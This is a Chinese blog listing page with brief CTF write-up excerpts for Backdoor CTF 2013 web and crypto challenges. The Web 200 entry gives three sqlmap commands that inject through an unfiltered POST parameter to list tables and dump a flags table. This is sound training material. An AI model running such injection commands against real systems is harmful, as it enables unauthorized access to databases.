Backdoor CTF 2013: Web 300

作者: 分类: CTF 评论: 暂无 时间: 2016-08-13 浏览: 3,027 次

0x00 题目

H4x0r的网站系统需要积分,为你账号获得积分从而获取flag,你可以审计一波网站系统源代码
提示:管理员有一堆积分,就看你能不能用了。

0x01 解题

阅读全文»

Backdoor CTF 2013: Web 500

作者: 分类: CTF 评论: 暂无 时间: 2016-08-13 浏览: 2,177 次

0x00 题目

有人提醒了H4x0r他的Web150新闻网站存在漏洞,所以H4x0r加固了网站。你现在需要找到网站管理用户的密码散列从而得到flag。

阅读全文»

Backdoor CTF 2013: Web 200

作者: 分类: CTF 评论: 暂无 时间: 2016-08-13 浏览: 1,500 次

0x00 题目

H4x0r在某个地方藏了一个flag,找到flag

0x01 解题

post的q参数没有过滤处理:

sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10
sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --tables
sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --sql-query="select * from flags"

Backdoor CTF 2013: Crypto 400

作者: 分类: CTF 评论: 暂无 时间: 2016-08-13 浏览: 3,313 次

0x00 题目

现在,这里有个公开的挑战,h4x0r创造了他自己的加密算法,决定向世界上所有的黑客发起挑战。他已经在这里公布了加密代码,他向你发起挑战,如果成功破解已加密的文本,承诺会给你丰厚的奖励。不要想得太复杂,已经给了提示,加密只是字母数字方式的。
使用上述加密算法之后的加密文本是:168 232 100 162 135 179 112 100 173 206 106 123 106 195 179 157 123 173
Flag就是文本信息的MD5值。
提示:有时候最直接的方法往往接近答案。

阅读全文»

Backdoor CTF 2013: Web 150

作者: 分类: CTF 评论: 暂无 时间: 2016-08-11 浏览: 2,529 次

0x00 题目

现在,你发现了H4x0r的公告网,这个站点在很久之前就建立了,所以有可能存在一些漏洞。
找到网站管理员密码的MD5值。

阅读全文»